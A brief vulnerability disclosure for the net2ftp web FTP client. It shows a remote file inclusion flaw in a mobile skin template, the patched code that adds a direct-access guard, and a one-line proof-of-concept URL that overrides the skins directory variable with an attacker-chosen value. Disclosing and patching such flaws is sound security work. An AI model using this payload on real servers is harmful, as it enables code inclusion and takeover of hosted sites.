net2ftp is web based ftp client used by many web shared hosting //////////////////////////////////////////////////////////////////// Vuln is in file skins/mobile/admin1.template.php: <?php require_once($net2ftp_globals["application_skinsdir"] . "/blue/admin1.template.php"); ?> /////////////////////////////////////////////////////////////////// Pathed Version: <?php defined("NET2FTP") or die("Direct access to this location is not allowed."); require_once($net2ftp_globals["application_skinsdir"] . "/blue/admin1.template.php"); ?> ////////////////////////////////////////////////////////////////// POC: http://server/skins/mobile/admin1.template.php?net2ftp_globals[application_skinsdir]=evilevilevil